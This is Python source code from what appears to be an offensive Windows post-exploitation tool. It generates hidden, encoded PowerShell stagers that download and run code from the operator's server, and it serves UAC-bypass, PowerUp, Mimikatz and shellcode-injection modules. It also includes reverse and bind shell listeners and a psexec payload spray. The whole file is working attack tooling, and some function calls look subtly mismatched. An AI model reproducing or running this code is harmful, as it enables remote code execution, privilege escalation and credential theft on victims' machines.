def reversePowerShellInvokeMimikatzGeneration(payloadchoice, payloadname): from menu import returnIP moduleport = FUNCTIONS().randomUnusedPort() FUNCTIONS().DoServe(returnIP(), "", "./externalmodules", port=moduleport, printIt=False) powershellScript = payloadchoice % (returnIP(), moduleport) clientnumber = int( clientUpload( payloadname, powershellScript, isExe=False, json= '{"type":"script", "data":"%s", "sendoutput":"true", "multiple":"false"}' )) from stager import returnServerList try: for server in returnServerList(): while True: if server.handlers[clientnumber].in_buffer: print server.handlers[clientnumber].in_buffer.pop() break else: time.sleep(0.1) except KeyboardInterrupt: pass return "pass"
def UACBYPASS(self, version): from menu import returnIP randomPort = FUNCTIONS().randomUnusedPort() uacbypassrcfilecontents = """run post/windows/manage/exec_powershell SCRIPT="IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/stage.ps1')" SESSION=1""" % ( returnIP(), randomPort) moduleport = FUNCTIONS().randomUnusedPort() FUNCTIONS().DoServe(returnIP(), "", "./externalmodules", port=moduleport, printIt=False) if version == "7": uacbypassfilecontent = """IEX (New-Object Net.WebClient).DownloadString("http://%s:%s/Invoke-BypassUAC.ps1");\nInvoke-BypassUAC -Command \"powershell -enc %s\" """ % ( returnIP(), moduleport, base64.b64encode( self.injectshellcode_nosleep.encode('utf_16_le'))) a = multiprocessing.Process(target=FUNCTIONS().stagePowershellCode, args=(uacbypassfilecontent, randomPort)) a.daemon = True a.start() elif version == "10": uacbypassfilecontent = """IEX (New-Object Net.WebClient).DownloadString("http://%s:%s/Invoke-SilentCleanUpBypass.ps1");\nInvoke-SilentCleanUpBypass -Command \"cmd /c powershell -WindowStyle Hidden -enc %s && REM\" """ % ( returnIP(), moduleport, base64.b64encode( self.injectshellcode_nosleep.encode('utf_16_le'))) a = multiprocessing.Process(target=FUNCTIONS().stagePowershellCode, args=(uacbypassfilecontent, randomPort)) a.daemon = True a.start() with open('uacbypass.rc', 'w') as uacbypassfilerc: uacbypassfilerc.write(uacbypassrcfilecontents) uacbypassfilerc.close() return self.shellcode
def printListener(printit=True, returnit=False): from listener import Server from menu import returnIP powershellFileName = 'p.ps1' while True: bindOrReverse = prompt_toolkit.prompt('[?] (b)ind/(r)everse: ', patch_stdout=True, completer=WordCompleter( ['b', 'r'])).lower() if bindOrReverse == 'b' or bindOrReverse == 'r': break if bindOrReverse == 'r': powershellContent = open('lib/powershell/stager.ps1', 'r').read() windows_powershell_stager = powershellContent % ('False', returnIP(), '5555') if bindOrReverse == 'b': powershellContent = open('lib/powershell/stager.ps1', 'r').read() windows_powershell_stager = powershellContent % ('True', '', '5556') with open((payloaddir() + '/' + powershellFileName), 'w') as powershellStagerFile: powershellStagerFile.write(windows_powershell_stager) powershellStagerFile.close() randoStagerDLPort = FUNCTIONS().randomUnusedPort() FUNCTIONS().DoServe(returnIP(), powershellFileName, payloaddir(), port=randoStagerDLPort, printIt=False) stagerexec = 'powershell -w hidden -noni -enc ' + ( "IEX (New-Object Net.Webclient).DownloadString('http://" + returnIP() + ":" + str(randoStagerDLPort) + "/" + powershellFileName + "')").encode('utf_16_le').encode('base64').replace('\n', '') if printit: print t.bold_green + '[!] Run this on target machine...' + t.normal + '\n\n' + stagerexec + '\n' if bindOrReverse == 'b': if not '5556' in str(serverlist): ipADDR = raw_input( '[?] IP Address of target (after executing stager): ') connectserver = Server(ipADDR, 5556, bindsocket=False) serverlist.append(connectserver) if bindOrReverse == 'r': if not '5555' in str(serverlist): listenerserver = Server('0.0.0.0', 5555, bindsocket=True) serverlist.append(listenerserver) if returnit: return stagerexec else: return "pass"
def clientUpload(powershellExec, isExe, json): from menu import returnIP from encrypt import getSandboxScripts clientnumber = checkUpload() if clientnumber: if isExe: newpayloadlayout = FUNCTIONS().powershellShellcodeLayout( powershellExec) moduleport = FUNCTIONS().randomUnusedPort() FUNCTIONS().DoServe(returnIP(), "", "./externalmodules", port=moduleport, printIt=False) encPowershell = getSandboxScripts('powershell') encPowershell += "IEX(New-Object Net.WebClient).DownloadString('http://%s:%s/Invoke-Shellcode.ps1');Start-Sleep 30;Invoke-Code -Force -Shellcode @(%s)" % ( returnIP(), moduleport, newpayloadlayout.rstrip(',')) encPowershell = base64.b64encode(encPowershell.encode('UTF-16LE')) fullExec = "$Arch = (Get-Process -Id $PID).StartInfo.EnvironmentVariables['PROCESSOR_ARCHITECTURE'];if($Arch -eq 'x86'){powershell -exec bypass -enc \"%s\"}elseif($Arch -eq 'amd64'){$powershell86 = $env:windir + '\SysWOW64\WindowsPowerShell\\v1.0\powershell.exe';& $powershell86 -exec bypass -enc \"%s\"}" % ( encPowershell, encPowershell) b64Exec = base64.b64encode(fullExec.encode('UTF-16LE')) lenb64 = len(b64Exec) else: b64Exec = base64.b64encode(powershellExec.encode('UTF-16LE')) lenb64 = len(b64Exec) splitPayoad = checkPayloadLength(b64Exec) if splitPayoad: for p in splitPayoad: for server in serverlist: if clientnumber in server.handlers.keys(): server.handlers[clientnumber].out_buffer.append(json % (p)) time.sleep(0.5) time.sleep(0.5) for server in serverlist: if clientnumber in server.handlers.keys(): server.handlers[clientnumber].out_buffer.append( '{"type":"", "data":"", "sendoutput":"false", "multiple":"exec"}' ) else: for server in serverlist: if clientnumber in server.handlers.keys(): server.handlers[clientnumber].out_buffer.append(json % (b64Exec)) return clientnumber else: return False
def ALLCHECKS(self): from menu import returnIP moduleport = FUNCTIONS().randomUnusedPort() FUNCTIONS().DoServe(returnIP(), "", "./externalmodules", port=moduleport, printIt=False) with open('allchecks.ps1', 'w') as allchecksfile: allchecksfile.write( """IEX (New-Object Net.WebClient).DownloadString("http://%s:%s/PowerUp.ps1");invoke-allchecks""" % (returnIP(), moduleport)) allchecksfile.close() return self.shellcode
def randomUnusedPort(self): from menu import returnIP s = socket.socket() s.bind((returnIP(), 0)) port = s.getsockname()[1] s.close() return port
def UACBypassGeneration(payloadchoice, payloadname): from menu import returnIP moduleport = FUNCTIONS().randomUnusedPort() FUNCTIONS().DoServe(returnIP(), "", "./externalmodules", port=moduleport, printIt=False) encoded = printListener(False, True) powershellScript = payloadchoice % (returnIP(), moduleport, encoded) clientnumber = int( clientUpload( payloadchoice(), isExe=False, json= '{"type":"script", "data":"%s", "sendoutput":"false", "multiple":"false"}' )) print t.bold_green + '\n[*] If UAC Bypass worked, expect a new admin session' + t.normal return "pass"
def DoPayloadUpload(payloadname): from menu import returnIP want_to_upload = raw_input( '\n[*] Upload To Local Websever or (p)sexec? [y]/p/n: ') if want_to_upload.lower() == 'p' or want_to_upload.lower() == 'psexec': DoPsexecSpray(payloaddir() + '/' + payloadname + '.exe') elif want_to_upload.lower() == 'y' or want_to_upload.lower() == '': FUNCTIONS().DoServe(returnIP(), payloadname, payloaddir(), port=8000, printIt=True)
def stagePowershellCode(self, powershellFileContents, port): from menu import returnIP DIR = 'stager' if not os.path.isdir(DIR): os.mkdir(DIR) os.chdir(DIR) with open('stage.ps1', 'w') as psFile: psFile.write(powershellFileContents) httpd = SocketServer.TCPServer((returnIP(), port), HANDLER) httpd.handle_request() os.chdir('..') import shutil shutil.rmtree(DIR)
def reverseIpAndPort(port): from menu import returnIP portnum = raw_input('\n[*] Press Enter For Default Port(%s)\n[*] Port> ' % (t.bold_green + port + t.normal)) if len(portnum) is 0: portnum = port IP = returnIP() ipaddr = raw_input( '\n[*] Press Enter To Get Local Ip Automatically(%s)\n[*] IP> ' % (t.bold_green + IP + t.normal)) if len(ipaddr) == 0: ipaddr = IP if not IP: print t.bold_red + 'Error Getting Ip Automatically' + t.normal ipaddr = raw_input( '\n[*] Please Enter Your IP Manually(Automatic Disabled)\n[*] IP> ' ) return (portnum, ipaddr)